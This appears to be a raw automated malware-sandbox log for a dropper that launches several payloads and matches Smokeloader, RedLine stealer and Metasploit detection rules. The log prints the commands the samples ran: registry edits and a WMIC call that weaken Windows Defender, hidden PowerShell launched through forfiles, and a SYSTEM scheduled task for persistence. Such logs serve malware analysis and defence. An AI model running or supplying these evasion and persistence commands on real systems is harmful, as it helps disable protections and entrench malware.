Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00405964 appears 116 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00408C14 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00406ACC appears 41 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00403400 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00445DE4 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 004078FC appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 004344EC appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00403494 appears 79 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00457D58 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00453330 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00457B4C appears 90 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 00403684 appears 221 times
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: String function: 004460B4 appears 59 times
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: String function: 00413954 appears 179 times
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7916 -ip 7916
Source: stories[1].exe.3.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: hI6pMK6rYY2urO_lpGyU85DA.exe.3.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: hI6pMK6rYY2urO_lpGyU85DA.tmp.7.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: hI6pMK6rYY2urO_lpGyU85DA.tmp.7.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: hI6pMK6rYY2urO_lpGyU85DA.tmp.7.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: hI6pMK6rYY2urO_lpGyU85DA.tmp.7.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: file.exe, 00000000.00000002.1416416612.000000000118E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.1417872247.0000000004025000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePDFReader.exe4 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameVQP.exe\ vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: 00000009.00000002.2102908522.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000009.00000002.2102510892.00000000004AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.1766538879.000000000198E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000A.00000002.1766830141.0000000001B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: univ[1].exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: tyq3dazbB0crObgKIDGLxiAO.exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Y-Cleaner.exe.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.adwa.spyw.evad.winEXE@114/107@8/13
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_00402940 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 9_2_00402940
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 7_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 11_2_004555D0
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00455DF8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA, 11_2_00455DF8
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004B2ECF CreateToolhelp32Snapshot,Module32First, 9_2_004B2ECF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004334B0 CoInitializeEx,CoInitializeSecurity,CoUninitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,VariantClear,CoUninitialize, 3_2_004334B0
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource, 7_2_00409BEC
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \BaseNamedObjects\Local\SM0:8124:64:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7916
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \BaseNamedObjects\Local\SM0:5880:64:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: \Sessions\1\BaseNamedObjects\KejwopdnfWW_3
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5372:120:WilError_03
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: nine.exe 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: @G@K 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: A@K. 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: two.exe 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: @G@K 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: ZYA. 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: NOSUB 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: GET 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: kc~z 9_2_00408A70
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: ^WB 9_2_004256B0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: @G@K 9_2_020C8CD7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: A@K. 9_2_020C8CD7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: @G@K 9_2_020C8CD7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: ZYA. 9_2_020C8CD7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: kc~z 9_2_020C8CD7
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Command line argument: @*C 9_2_020C8CD7
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization Jump to behavior
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1748876102.00000000036A1000.00000004.00000020.00020000.00000000.sdmp, G__XJZ9ACVwRjgVn6BXId6E1.exe, 00000006.00000003.1749442825.00000000036A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 57%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Process created: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp "C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp" /SL5="$70060,2863082,54272,C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe"
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process created: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process created: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe "C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe" -i
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7916 -ip 7916
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process created: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe .\Install.exe /dXVdidiCT "385121" /S
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 736
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 7916 -ip 7916
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 744
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7916 -ip 7916
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 764
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7916 -ip 7916
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 748
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\SysWOW64\gpupdate.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7916 -ip 7916
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 984
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bMvfdBTccYfZYKRCwN" /SC once /ST 18:54:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe\" Is /mKdidL 385121 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7916 -ip 7916
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Process created: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp "C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp" /SL5="$70060,2863082,54272,C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe" Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Process created: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe .\Install.exe Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Process created: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe "C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe" -i Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Process created: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe .\Install.exe /dXVdidiCT "385121" /S Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 736
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 7916 -ip 7916
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 744
